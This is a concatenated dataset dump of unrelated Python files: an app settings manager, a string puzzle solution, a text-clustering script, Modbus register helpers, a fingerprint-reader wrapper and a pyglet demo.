localization.setup('rummage', join(cls.config_folder, \"locale\"), cls.get_language())\n debug_struct(cls.settings)\n debug_struct(cls.cache)\n cls.init_notify(True)\n\n @classmethod\n def get_hide_limit(cls):\n \"\"\"\n Get hide limit setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"hide_limit\", False)\n\n @classmethod\n def set_hide_limit(cls, hide):\n \"\"\"\n Set hide limit setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"hide_limit\"] = hide\n cls.save_settings()\n\n\n @classmethod\n def get_language(cls):\n \"\"\"\n Get locale language\n \"\"\"\n\n cls.reload_settings()\n locale = cls.settings.get(\"locale\", \"en_US\")\n if locale == \"en_US\" and not exists(join(cls.config_folder, \"locale\", \"en_US\")):\n locale = None\n return locale\n\n @classmethod\n def set_language(cls, language):\n \"\"\"\n Set locale language\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"locale\"] = language\n cls.save_settings()\n\n @classmethod\n def get_languages(cls):\n \"\"\"\n Return languages\n \"\"\"\n\n languages = []\n base = join(cls.config_folder, \"locale\")\n if exists(base):\n for file_obj in listdir(base):\n if isdir(join(base, file_obj)):\n languages.append(file_obj)\n if len(languages) == 0 or \"en_US\" not in languages:\n languages.append(\"en_US\")\n languages.sort()\n return languages\n\n @classmethod\n def get_debug(cls):\n \"\"\"\n Get debug level setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"debug\", False)\n\n @classmethod\n def set_debug(cls, enable):\n \"\"\"\n Set debug level setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"debug\"] = enable\n set_debug_mode(enable)\n cls.save_settings()\n\n @classmethod\n def get_times(cls):\n \"\"\"\n Get timestamp on files\n \"\"\"\n\n try:\n settings_time = getmtime(cls.settings_file)\n cache_time = getmtime(cls.cache_file)\n cls.settings_time = settings_time\n cls.cache_time = cache_time\n except Exception as e:\n debug(e)\n error(\"Could not get timestamp of file!\")\n pass\n\n @classmethod\n def changed(cls):\n \"\"\"\n Check if settings or cache have changed\n \"\"\"\n\n old_settings = cls.settings_time\n old_cache = cls.cache_time\n cls.get_times()\n try:\n changed = old_settings != cls.settings_time or old_cache != cls.cache_time\n except:\n error(\"Could not compare timestamp of file!\")\n changed = False\n return changed\n\n @classmethod\n def get_settings_files(cls):\n \"\"\"\n Get settings, cache, log, and fifo location\n \"\"\"\n\n if _PLATFORM == \"windows\":\n folder = expanduser(\"~\\\\.rummage\")\n if not exists(folder):\n mkdir(folder)\n settings = join(folder, SETTINGS_FILE)\n cache = join(folder, CACHE_FILE)\n log = join(folder, LOG_FILE)\n cls.fifo = join(folder, '\\\\\\\\.\\\\pipe\\\\rummage')\n cls.config_folder = folder\n elif _PLATFORM == \"osx\":\n folder = expanduser(\"~/Library/Application Support/Rummage\")\n if not exists(folder):\n mkdir(folder)\n settings = join(folder, SETTINGS_FILE)\n cache = join(folder, CACHE_FILE)\n log = join(folder, LOG_FILE)\n cls.fifo = join(folder, FIFO)\n cls.config_folder = folder\n elif _PLATFORM == \"linux\":\n folder = expanduser(\"~/.config/Rummage\")\n if not exists(folder):\n mkdir(folder)\n settings = join(folder, SETTINGS_FILE)\n cache = join(folder, CACHE_FILE)\n log = join(folder, LOG_FILE)\n cls.fifo = join(folder, FIFO)\n cls.config_folder = folder\n try:\n for filename in [settings, cache]:\n if not exists(filename):\n with codecs.open(filename, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps({}, sort_keys=True, indent=4, separators=(',', ': ')))\n except Exception:\n pass\n return settings, cache, log\n\n @classmethod\n def get_config_folder(cls):\n \"\"\"\n Return config folder\n \"\"\"\n\n return cls.config_folder\n\n @classmethod\n def get_fifo(cls):\n \"\"\"\n Get fifo pipe\n \"\"\"\n\n return cls.fifo\n\n @classmethod\n def reload_settings(cls):\n \"\"\"\n Check if the settings have changed and reload if needed\n \"\"\"\n\n if cls.changed():\n debug(\"Reloading settings.\")\n settings = None\n cache = None\n if cls.settings_file is not None:\n try:\n with codecs.open(cls.settings_file, \"r\", encoding=\"utf-8\") as f:\n settings = json.loads(sanitize_json(f.read(), preserve_lines=True))\n with codecs.open(cls.cache_file, \"r\", encoding=\"utf-8\") as f:\n cache = json.loads(sanitize_json(f.read(), preserve_lines=True))\n except Exception:\n pass\n if settings is not None:\n cls.settings = settings\n if cache is not None:\n cls.cache = cache\n\n @classmethod\n def get_editor(cls, filename=\"{$file}\", line=\"{$line}\", col=\"{$col}\"):\n \"\"\"\n Get editor command and replace file, line, and col symbols\n \"\"\"\n\n cls.reload_settings()\n editor = cls.settings.get(\"editor\", [])\n if isinstance(editor, dict):\n editor = editor.get(_PLATFORM, [])\n\n return [arg.replace(\"{$file}\", filename).replace(\"{$line}\", str(line)).replace(\"{$col}\", str(col)) for arg in editor]\n\n @classmethod\n def set_editor(cls, editor):\n \"\"\"\n Set editor command\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"editor\"] = editor\n cls.save_settings()\n\n @classmethod\n def get_single_instance(cls):\n \"\"\"\n Get single instance setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"single_instance\", False)\n\n @classmethod\n def set_single_instance(cls, single):\n \"\"\"\n Set single instance setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"single_instance\"] = single\n cls.save_settings()\n\n @classmethod\n def add_search(cls, name, search, is_regex):\n \"\"\"\n Add saved search\n \"\"\"\n\n cls.reload_settings()\n searches = cls.settings.get(\"saved_searches\", [])\n searches.append((name, search, is_regex))\n cls.settings[\"saved_searches\"] = searches\n cls.save_settings()\n\n @classmethod\n def get_search(cls, idx=None):\n \"\"\"\n Get saved searches or search at index if given\n \"\"\"\n\n value = None\n cls.reload_settings()\n searches = cls.settings.get(\"saved_searches\", [])\n if idx is None:\n value = searches\n elif idx < len(searches):\n value = searches[idx]\n return value\n\n @classmethod\n def delete_search(cls, idx):\n \"\"\"\n Delete the search at given index\n \"\"\"\n\n cls.reload_settings()\n searches = cls.settings.get(\"saved_searches\", [])\n if idx < len(searches):\n del searches[idx]\n cls.settings[\"saved_searches\"] = searches\n cls.save_settings()\n\n @classmethod\n def get_alert(cls):\n \"\"\"\n Get alert setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"alert_enabled\", True)\n\n @classmethod\n def set_alert(cls, enable):\n \"\"\"\n Set alert setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"alert_enabled\"] = enable\n cls.save_settings()\n\n @classmethod\n def init_notify(cls, first_time=False):\n \"\"\"\n Setup growl notification\n \"\"\"\n\n # Set up notifications\n if first_time:\n notify.setup_notifications(\"Rummage\", rum_64.GetData(), rum_tray.GetData(), cls.get_config_folder())\n notify.enable_growl(cls.get_notify_method() == \"growl\" and notify.has_growl())\n\n @classmethod\n def get_notify(cls):\n \"\"\"\n Get notification setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"notify_enabled\", True)\n\n @classmethod\n def set_notify(cls, enable):\n \"\"\"\n Set notification setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"notify_enabled\"] = enable\n cls.save_settings()\n\n @classmethod\n def get_platform_notify(cls):\n \"\"\"\n Get all possible platform notification styles\n \"\"\"\n\n return NOTIFY_STYLES[_PLATFORM]\n\n @classmethod\n def get_notify_method(cls):\n \"\"\"\n Get notification style\n \"\"\"\n\n cls.reload_settings()\n method = cls.settings.get(\"notify_method\", NOTIFY_STYLES[_PLATFORM][0])\n if method is None or method == \"wxpython\" or method not in NOTIFY_STYLES[_PLATFORM]:\n method = NOTIFY_STYLES[_PLATFORM][0]\n return method\n\n @classmethod\n def set_notify_method(cls, notify_method):\n \"\"\"\n Set notification style\n \"\"\"\n\n if notify_method not in [\"native\", \"default\", \"growl\"]:\n notify_method = NOTIFY_STYLES[_PLATFORM][0]\n if notify_method in [\"default\", \"native\"]:\n notify_method = \"wxpython\"\n cls.reload_settings()\n cls.settings[\"notify_method\"] = notify_method\n cls.save_settings()\n cls.init_notify()\n\n @classmethod\n def get_search_setting(cls, key, default):\n \"\"\"\n Get search history setting from cache\n \"\"\"\n\n cls.reload_settings()\n return cls.cache.get(key, default)\n\n @classmethod\n def add_search_settings(cls, history, toggles, strings):\n \"\"\"\n Add search settings to cache (more like history...but whatever)\n \"\"\"\n\n cls.reload_settings()\n debug(history)\n for i in history:\n key = i[0]\n value = i[1]\n if value is None or value == \"\":\n continue\n values = cls.cache.get(key, [])\n if value in values:\n values.remove(value)\n values.insert(0, value)\n if len(values) > 20:\n del values[-1]\n cls.cache[key] = values\n for t in toggles:\n key = t[0]\n value = t[1]\n if value is None:\n continue\n cls.cache[key] = value\n for s in strings:\n key = s[0]\n value = s[1]\n if value is None:\n continue\n cls.cache[key] = value\n\n cls.save_cache()\n\n @classmethod\n def get_history_record_count(cls, history_types=[]):\n \"\"\"\n Get number of history items saved\n \"\"\"\n\n cls.reload_settings()\n count = 0\n for h in history_types:\n count += len(cls.cache.get(h, []))\n return count\n\n @classmethod\n def clear_history_records(cls, history_types=[]):\n \"\"\"\n Clear history types\n \"\"\"\n\n cls.reload_settings()\n for h in history_types:\n if cls.cache.get(h, None) is not None:\n cls.cache[h] = []\n cls.save_cache()\n\n @classmethod\n def save_settings(cls):\n \"\"\"\n Save settings\n \"\"\"\n\n try:\n with codecs.open(cls.settings_file, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(cls.settings, sort_keys=True, indent=4, separators=(',', ': ')))\n except:\n e = traceback.format_exc()\n try:\n errormsg(_(\"Failed to save settings file!\"))\n error(e)\n except:\n print(str(e))\n\n @classmethod\n def save_cache(cls):\n \"\"\"\n Save cache\n \"\"\"\n\n try:\n with codecs.open(cls.cache_file, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(cls.cache, sort_keys=True, indent=4, separators=(',', ': ')))\n except:\n e = traceback.format_exc()\n try:\n errormsg(_(\"Failed to save cache file!\"))\n error(e)\n except:\n print(str(e))\n","sub_path":"_gui/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":15757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"419552366","text":"class Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n l = len(s)\n numRows -= 1\n res = \"\"\n if numRows==0: return s\n for i in range(0,l,2*numRows):\n res += s[i]\n if numRows > 1:\n for j in range(1,numRows):\n for k in range(j,l,2*numRows):\n res += s[k]\n if k+2*numRows-2*j mchiene DIST: 2\n\n# Bag-of-Word\n#\n# post1: 'How to format my hard disk'\n# post2: 'Hard disk format problems'\n#\n# Word Post2Count Post2Count\n# disk 1 1\n# format 1 1\n# how 1 0\n# hard 1 1\n# my 1 0\n# problems 0 1\n# to 1 0\n#\n# Vector:\n# post1: [1, 1, 1, 1, 1, 0, 1]\n# post2: [1, 1, 0, 1, 0, 1, 0]\n#\n# Similar Ratio: euler-distance(post1, post2)\n\nimport os\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nvectorizer = CountVectorizer(min_df=1)\nprint(vectorizer)\n\ncontent = [\"How to format my hard disk\", \" Hard disk format problems \"]\nX = vectorizer.fit_transform(content)\nprint(vectorizer.get_feature_names())\nprint(X.toarray().transpose())\n\nDIR = '.'\n\nposts = [open(os.path.join(DIR, f)).read() for f in os.listdir(DIR)]\nX_train = vectorizer.fit_transform(posts)\nnum_samples, num_features = X_train.shape\nprint('#samples: %d, #features: %d' % (num_samples, num_features))\nprint(vectorizer.get_feature_names())\n\n# feature vector\nprint(X_train.getrow(3).toarray())\nprint(X_train.getrow(4).toarray())\n\n# stem extract\nimport nltk.stem\n\ns = nltk.stem.SnowballStemmer('english')\nprint(s.stem(\"graphics\"))\nprint(s.stem(\"imaging\"))\nprint(s.stem(\"image\"))\nprint(s.stem(\"imagination\"))\nprint(s.stem(\"imagine\"))\n\n# NLTK stemmed CountVectorizer\nenglish_stemmer = nltk.stem.SnowballStemmer('english')\n\n\nclass StemmedCountVectorizer(CountVectorizer):\n def build_analyzer(self):\n analyzer = super(StemmedCountVectorizer, self).build_analyzer()\n return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))\n\n\nvectorizer = StemmedCountVectorizer(min_df=1, stop_words='english')\n\nprint(vectorizer)\n\n# stop word boost (TF-IDF)\nimport math\nimport scipy as sp\n\n\ndef tfidf(term, doc, docset):\n tf = float(doc.count(term))/sum(doc.count(w) for w in docset)\n idf = math.log(float(len(docset))/(len([doc for doc in docset if term in doc])))\n return tf * idf\n\n\na, abb, abc = [\"a\"], [\"a\", \"b\", \"b\"], [\"a\", \"b\", \"c\"]\nD = a + abb + abc\nprint(tfidf(\"a\", a, D))\nprint(tfidf(\"b\", abb, D))\nprint(tfidf(\"a\", abc, D))\nprint(tfidf(\"b\", abc, D))\nprint(tfidf(\"c\", abc, D))\n\n# Cluster\n#\n# flat cluster\n# hierarchy cluster\n#\n# sklearn.cluster\n# http://scikit-learn.org/dev/modules/clustering.html\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n def build_analyzer(self):\n analyzer = super(TfidfVectorizer, self).build_analyzer()\n return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))\n\n\nvectorizer = StemmedTfidfVectorizer(min_df=1, stop_words='english')\nprint(vectorizer)\n","sub_path":"refs/machinelearning/posts/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"368822704","text":"#!/usr/bin/env python\n\n'''\n\n\n'''\n\nfrom FlclModbus.util import int_to_bytes, bytes_to_int\n\n\nHOLDING_REGISTER='holding'\nCOIL='coil'\nINPUT_REGISTER='input'\nDISCRETE_INPUT='discrete_input'\n\nREGISTER_TYPES = {\n COIL: {\n 'offset':1,\n 'read_one': 'read_coils',\n 'write_one': 'write_coil',\n 'read_multi': 'read_coils',\n 'write_multi': 'write_coils'\n },\n DISCRETE_INPUT: {\n 'offset':10001,\n 'read_one': 'read_discrete_inputs',\n 'read_multi': 'read_discrete_inputs',\n },\n INPUT_REGISTER: {\n 'offset':30001,\n 'read_one': 'read_input_registers',\n 'read_multi': 'read_input_registers',\n },\n HOLDING_REGISTER: {\n 'offset':40001,\n 'read_one': 'read_holding_registers',\n 'write_one': 'write_register',\n 'read_multi': 'read_holding_registers',\n 'write_multi': 'write_registers'\n }\n}\n\n\nclass ModbusData(object):\n\n\n def __init__(self, type, address, value, unit=0x01):\n self.type=type\n self.address=address\n self.value=value\n self.unit=unit\n self.number=self.address+REGISTER_TYPES.get(type).get('offset')\n\n\n def get_type_description(self):\n return REGISTER_TYPES.get(self.type)\n\n\n def get_number(self):\n return self.number\n\n\nclass ModbusRegister(ModbusData):\n\n\n def __init__(self, type, address, value=0, unit=0x01):\n ModbusData.__init__(self, type, address, value, unit=0x01)\n self.bin_value= str(value) if value<=1 else bin(value>>1)+str(value&1)\n self.bin_value= self.bin_value.lstrip('0b')\n\n\n def get_bit_at(self,pos=0):\n if pos >= 0 and pos <16:\n return int(self.bin_value[abs(pos-15)])\n else:\n return -1\n\n\n def set_value(self, value):\n self.bin_value= str(value) if value<=1 else bin(value>>1)+str(value&1)\n self.bin_value= self.bin_value.lstrip('0b')\n self.value=value\n\n\n\nclass ModbusSingle(ModbusData):\n\n\n def __init__(self, type, address, value=False, unit=0x01):\n ModbusData.__init__(self, type, address, value, unit=0x01)\n\n\nclass ModbusCoil(ModbusSingle):\n\n\n def __init__(self, address, value=False, unit=0x01):\n ModbusSingle.__init__(self, COIL, address,\n value=value, unit=unit)\n\n\n def set_value(self, value):\n self.value=value\n\n\nclass ModbusDiscreteInput(ModbusSingle):\n\n\n def __init__(self, address, value=False, unit=0x01):\n ModbusSingle.__init__(self, DISCRETE_INPUT, address,\n value=value, unit=unit)\n\n\nclass ModbusInputRegister(ModbusRegister):\n\n\n def __init__(self, address, value=0, unit=0x01):\n ModbusRegister.__init__(self, INPUT_REGISTER, address,\n value=value, unit=unit)\n\n\nclass ModbusHoldingRegister(ModbusRegister):\n\n\n def __init__(self, address, value=0, unit=0x01):\n ModbusRegister.__init__(self, HOLDING_REGISTER, address,\n value=value, unit=unit)\n\n\n def set_bit_value(self, pos, val):\n p = 0\n prev = self.bin_value\n new = ''\n while p < 16:\n if p == abs(pos-15):\n v = val\n else:\n v = self.bin_value[p]\n new = '{}{}'.format(new,v)\n p=p+1\n self.bin_value = new\n self.value = int(new,2)\n\n\nclass ModbusRegisterFormatter(object):\n\n\n @staticmethod\n def set_int_in_register(value, register):\n register.set_value(value)\n return register\n\n\n @staticmethod\n def set_int_in_register_list(value, registers):\n il=int_to_bytes(value, len(registers))\n for i in range(0, len(registers)):\n registers[i].value=il[i]\n return registers\n\n\n @staticmethod\n def set_float_in_register(value, register, coef):\n val=int(value*coef)\n return ModbusRegisterFormatter.set_int_in_register(val, register)\n\n\n @staticmethod\n def set_float_in_register_list(value, registers, coef):\n val=int(value*coef)\n return ModbusRegisterFormatter.set_int_in_register_list(val, registers)\n\n\n @staticmethod\n def set_bool_in_register(value, register):\n if value==True:\n register.set_value(0x01)\n else:\n register.set_value(0x00)\n return register\n\n\n @staticmethod\n def set_bool_in_register_at(value, register, pos):\n if value==True:\n v=1\n else:\n v=0\n try:\n register.set_bit_value(pos, v)\n except:\n pass\n return register\n\n\n @staticmethod\n def make_int_from_register(register):\n return int(register.value)\n\n\n @staticmethod\n def make_int_from_list(registers):\n l=[]\n for reg in registers:\n l.append(reg.value)\n return bytes_to_int(l)\n\n\n @staticmethod\n def make_float_from_register(register, coef):\n return float(register.value)/float(coef)\n\n\n @staticmethod\n def make_float_from_list(registers, coef):\n fv=float(ModbusRegisterFormatter.make_int_from_list(registers))\n return fv /float(coef)\n\n\n @staticmethod\n def make_boolean_from_bit(register, pos):\n v=register.get_bit_at(pos)\n return v==1\n\n\n @staticmethod\n def make_boolean_from_register(register):\n return register.value>0\n","sub_path":"FlclModbusService/src/FlclModbus/FlclModbusRegister.py","file_name":"FlclModbusRegister.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"56854631","text":"\"\"\"\n * author - Akshay Tekam\n * date - ${DATE}\n * time - ${TIME}\n * package - ${PACKAGE_NAME}\n * Title - prints the Euclidean distance from the\n point(x,y)to the origin(0,0).\n\"\"\"\nimport math\nclass Distance:\n # calculate distance between two points.\n def findDistance(self):\n\n p1 = [4, 2]\n p2 = [0, 0]\n\n # Formula for Euclidean distance\n distance = math.sqrt(((p1[0] - p2[0]) ** 2) + ((p1[1] - p2[1]) ** 2))\n print(distance)\nobj=Distance()\nobj.findDistance()\n","sub_path":"DistanceBetTwoPoint.py","file_name":"DistanceBetTwoPoint.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"282454978","text":"from ctypes import *\nfrom users.APIs.dpfj import *\nfrom users.APIs.dpfpdd import *\nfrom users.models import Client\n\nso_file = \"C:/Apache24/htdocs/myenv/conequi-deploy/users/APIs/lib/windows/x64/dpfpdd\"\ndpfpdd = CDLL(so_file)\nso_file = \"C:/Apache24/htdocs/myenv/conequi-deploy/users/APIs/lib/windows/x64/dpfj\"\ndpfj = CDLL(so_file)\n\ndef CaptureFinger(szFingerName, hReader, nFtType, ppFt, pFtSize):\n result = c_int(0)\n ppFt = c_void_p\n pFtSize = 0\n\n cparam = DPFPDD_CAPTURE_PARAM(0)\n cparam.size = sizeof(cparam)\n cparam.image_fmt = DPFPDD_IMG_FMT_ISOIEC19794\n cparam.image_proc = DPFPDD_IMG_PROC_NONE\n cparam.image_res = 500\n \n cresult = DPFPDD_CAPTURE_RESULT(0)\n cresult.size = sizeof(cresult)\n cresult.info.size = sizeof(cresult.info)\n \n nImageSize = c_uint(0)\n \n dpfpdd.dpfpdd_capture.arftypes = [DPFPDD_DEV,POINTER(DPFPDD_CAPTURE_PARAM),c_uint,POINTER(DPFPDD_CAPTURE_RESULT),POINTER(c_uint),POINTER(c_ubyte)]\n dpfpdd.dpfpdd_capture.restypes = c_int\n dpfpdd.dpfpdd_capture(hReader,byref(cparam),0,byref(cresult),byref(nImageSize),None)\n \n pImage = (c_ubyte*139990)(*b'')\n \n\n while(1):\n is_ready = 0\n while(1):\n ds = DPFPDD_DEV_STATUS()\n ds.size = sizeof(DPFPDD_DEV_STATUS)\n result = dpfpdd.dpfpdd_get_device_status(hReader, byref(ds))\n if(DPFPDD_SUCCESS != result):\n return \"dpfpdd_get_device_status()\"\n break\n if(DPFPDD_STATUS_READY == ds.status or DPFPDD_STATUS_NEED_CALIBRATION == ds.status):\n is_ready = 1\n break\n \n if (is_ready == 0):\n break\n\n #print(\"Put\", szFingerName,\" on the reader, or press Ctrl-C to cancel...\")\n result = dpfpdd.dpfpdd_capture(hReader, byref(cparam), -1, byref(cresult), byref(nImageSize), pImage)\n \n if(DPFPDD_SUCCESS != result):\n return \"Erro dpfpdd_capture()\"\n else:\n if cresult.success:\n #print(\"fingerprint captured\")\n nFeaturesSize = c_uint(MAX_FMD_SIZE)\n \n pFeatures = (c_ubyte*1562)(*b'')\n\n dpfj.dpfj_create_fmd_from_fid.argtypes = [DPFJ_FID_FORMAT,POINTER(c_ubyte),c_uint,DPFJ_FMD_FORMAT,POINTER(c_ubyte),POINTER(c_uint)]\n dpfj.dpfj_create_fmd_from_fid.restypes = c_int\n result = dpfj.dpfj_create_fmd_from_fid(DPFJ_FID_ISO_19794_4_2005, pImage, nImageSize, nFtType, pFeatures, byref(nFeaturesSize))\n if(DPFJ_SUCCESS == result):\n ppFt = pFeatures\n pFtSize = nFeaturesSize\n \n #print(\"features extracted.\")\n break\n return result, ppFt, pFtSize\n \n \n\n\n\ndef Verification(hReader):\n pFeatures1 = c_ubyte()\n nFeatures1Size = c_uint(0)\n pFeatures2= c_ubyte()\n nFeatures2Size = c_uint(0)\n\n bStop = False\n while(bStop != True):\n #print(\"Verification started\")\n result, pFeatures1, nFeatures1Size = CaptureFinger(\"any finger\", hReader, DPFJ_FMD_ISO_19794_2_2005, byref(pFeatures1), byref(nFeatures1Size))\n \n if result == 0:\n users= Client.objects.filter(fingerprint__contains='FMR')\n #print(users)\n result = 0\n if result == 0:\n falsematch_rate = c_uint(0)\n for user in users:\n #print(user.usuario)\n res = [] \n for ele in user.fingerprint:\n res.extend(ord(num) for num in ele)\n pFeatures2 = (c_ubyte * len(res))(*res)\n #print(pFeatures2)\n nFeatures2Size = sizeof(pFeatures2) \n dpfj.dpfj_compare.argtypes = [DPFJ_FMD_FORMAT,POINTER(c_ubyte),c_uint,c_uint,DPFJ_FMD_FORMAT,POINTER(c_ubyte),c_uint,c_uint,POINTER(c_uint)]\n dpfj.dpfj_compare.restype = c_int\n result = dpfj.dpfj_compare(DPFJ_FMD_ISO_19794_2_2005, pFeatures1, nFeatures1Size, 0, DPFJ_FMD_ISO_19794_2_2005, pFeatures2, nFeatures2Size, 0, byref(falsematch_rate))\n \n if(DPFJ_SUCCESS == result):\n #target_falsematch_rate = c_long(21474.83647)\n #print(falsematch_rate)\n if(falsematch_rate.value == 0):\n #print(\"Fingerprints matched.\")\n #print(user.usuario)\n return user.usuario\n\n else:\n #print(\"Fingerprints did not match.\")\n continue\n else:\n print(\"ouraoura\")\n return \"Erro dpfj_compare()\"\n return \"N\"\n else: \n return \"Error\"\n bStop = True\n\n\n\n\n# Defining main function \ndef main(tipo):\n #Inicializar\n\n #dpfpdd.dpfpdd_exit()\n \n result = dpfpdd.dpfpdd_init()\n if(DPFPDD_SUCCESS == result): \n #print(\"calling dpfpdd_init()\")\n #print(\"----------------------\")\n\n\n #Informações sobre o leitor\n dev_cnt = c_uint(2)\n dev_infos = DPFPDD_DEV_INFO()\n dpfpdd.dpfpdd_query_devices.argtypes = [POINTER(c_uint),POINTER(DPFPDD_DEV_INFO)]\n dpfpdd.dpfpdd_query_devices.restype = c_int\n result = dpfpdd.dpfpdd_query_devices(dev_cnt,byref(dev_infos))\n #print(dev_cnt)\n #print(result)\n if(DPFPDD_SUCCESS == result):\n #print(\"Varredura Completa\")\n #print(\"----------------------\")\n #printf(b\"Nome do dispositivo conectado: %s\\n\", dev_infos.name)\n #print(\"----------------------\")\n #Inicia o leitor\n pdev = DPFPDD_DEV()\n dev_name = dev_infos.name\n #dpfpdd.dpfpdd_close(pdev)\n dpfpdd.dpfpdd_open.argtypes = [POINTER(c_char),POINTER(DPFPDD_DEV)]\n dpfpdd.dpfpdd_open.restype = c_int\n result = dpfpdd.dpfpdd_open(dev_name,byref(pdev))\n #result = dpfpdd.dpfpdd_open_ext(dev_name, DPFPDD_PRIORITY_EXCLUSIVE, byref(pdev))\n #print(dev_name)\n #print(result)\n if(DPFPDD_SUCCESS == result):\n #print(\"Dispositivo Selecionado\")\n #print(\"----------------------\")\n\n #funcionalidades do leitor\n dev_caps = DPFPDD_DEV_CAPS(60)\n dpfpdd.dpfpdd_get_device_capabilities.argtypes = [DPFPDD_DEV,POINTER(DPFPDD_DEV_CAPS)]\n dpfpdd.dpfpdd_get_device_capabilities.restype = c_int\n if DPFPDD_SUCCESS == dpfpdd.dpfpdd_get_device_capabilities(pdev,dev_caps):\n #print(\"Funcionalidades adquiridas\")\n #print(\"dpi do leitor: \",dev_caps.resolutions[0])\n #print(\"----------------------\")\n \n if tipo == \"Verification\":\n result = Verification(pdev)\n else:\n pFeatures1 = c_ubyte()\n nFeatures1Size = c_uint(0) \n result, pFeatures1, nFeatures1Size = CaptureFinger(\"any finger\", pdev, DPFJ_FMD_ISO_19794_2_2005, byref(pFeatures1), byref(nFeatures1Size))\n if(DPFPDD_SUCCESS == result):\n #converte\n result = ''.join(chr(i) for i in pFeatures1)\n else:\n result = \"Erro ao adquirir impressão\"\n \n \n\n else:\n return \"Erro ao adiquirir Funcionalidades\"\n \n else:\n return \"Erro ao selecionar dispositivo.\"\n \n #Fecha o despositivo\n dpfpdd.dpfpdd_close.argtypes = [DPFPDD_DEV]\n #print(\"fechou\")\n dpfpdd.dpfpdd_close.restype = c_int\n if DPFPDD_SUCCESS != dpfpdd.dpfpdd_close(pdev):\n return \"Erro ao encerrar\"\n #print(\"----------------------\")\n\n\n else:\n return \"Erro ao fazer varredura\"\n #print(\"----------------------\")\n \n #Finalizar\n dpfpdd.dpfpdd_exit()\n return result\n\n else: return \"Erro when calling dpfpdd_init()\" \n","sub_path":"users/APIs/fingerPrint.py","file_name":"fingerPrint.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9177455","text":"'''\nnoisy\n=====\n\nThis is an example program that accompanies pyglet (http://www.pyglet.org).\nDue to licensing restrictions on some of the assets, this game cannot be used\nfor commercial purposes.\n\nThe source code is licensed under the BSD license.\n\nAll artwork is Copyright 2007 Alex Holkner.\nThe sound is licensed under Creative Commons Sampling License:\n\n\"ball.wav\"\nby opm (http://freesound.iua.upf.edu/usersViewSingle.php?id=1622)\n RS_set2.wav (http://freesound.iua.upf.edu/samplesViewSingle.php?id=2096)\n\n\nThis is a simple demonstration of how pyglet efficiently manages many sound\nchannels without intervention.\n'''\n\nimport os\nimport random\nimport sys\n\nfrom pyglet.gl import *\nfrom pyglet.window import Window\nfrom pyglet.window import key\nfrom pyglet import image\nfrom pyglet import clock\nfrom pyglet import media\nfrom pyglet import font\n\nPKG = os.path.dirname(__file__)\nBALL_IMAGE = os.path.join(PKG, 'ball.png')\nBALL_SOUND = os.path.join(PKG, 'ball.wav')\n\nif len(sys.argv) > 1:\n BALL_SOUND = sys.argv[1]\n\nwindow = Window(640, 480)\nsound = media.load(BALL_SOUND, streaming=False)\n\nclass Ball(object):\n ball_image = image.load(BALL_IMAGE)\n width = ball_image.width\n height = ball_image.height\n def __init__(self):\n self.x = random.random() * (window.width - self.width)\n self.y = random.random() * (window.height - self.height)\n self.dx = (random.random() - 0.5) * 1000\n self.dy = (random.random() - 0.5) * 1000\n\n def update(self, dt):\n if self.x <= 0 or self.x + self.width >= window.width:\n self.dx *= -1\n sound.play()\n if self.y <= 0 or self.y + self.height >= window.height:\n self.dy *= -1\n sound.play()\n self.x += self.dx * dt\n self.y += self.dy * dt\n\n self.x = min(max(self.x, 0), window.width - self.width)\n self.y = min(max(self.y, 0), window.height - self.height)\n\n def draw(self):\n self.ball_image.blit(self.x, self.y, 0)\n\nballs = []\n\n@window.event\ndef on_key_press(symbol, modifiers):\n if symbol == key.SPACE:\n balls.append(Ball())\n elif symbol == key.BACKSPACE:\n if balls:\n del balls[-1]\n elif symbol == key.ESCAPE:\n window.has_exit = True\n\nif __name__ == '__main__':\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n label = font.Text(font.load('Arial', 14),\n 'Press space to add a ball, backspace to remove.',\n window.width / 2, 10,\n halign=font.Text.CENTER)\n\n while not window.has_exit:\n window.dispatch_events()\n media.dispatch_events()\n dt = clock.tick()\n\n glClear(GL_COLOR_BUFFER_BIT)\n for ball in balls:\n ball.update(dt)\n ball.draw()\n label.draw()\n\n window.flip()\n\n","sub_path":"crunchy/server_root/examples/pyglet_test.py","file_name":"pyglet_test.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"557645139","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom config import args\nimport cv2\nfrom torchvision import transforms\nfrom model.utils import 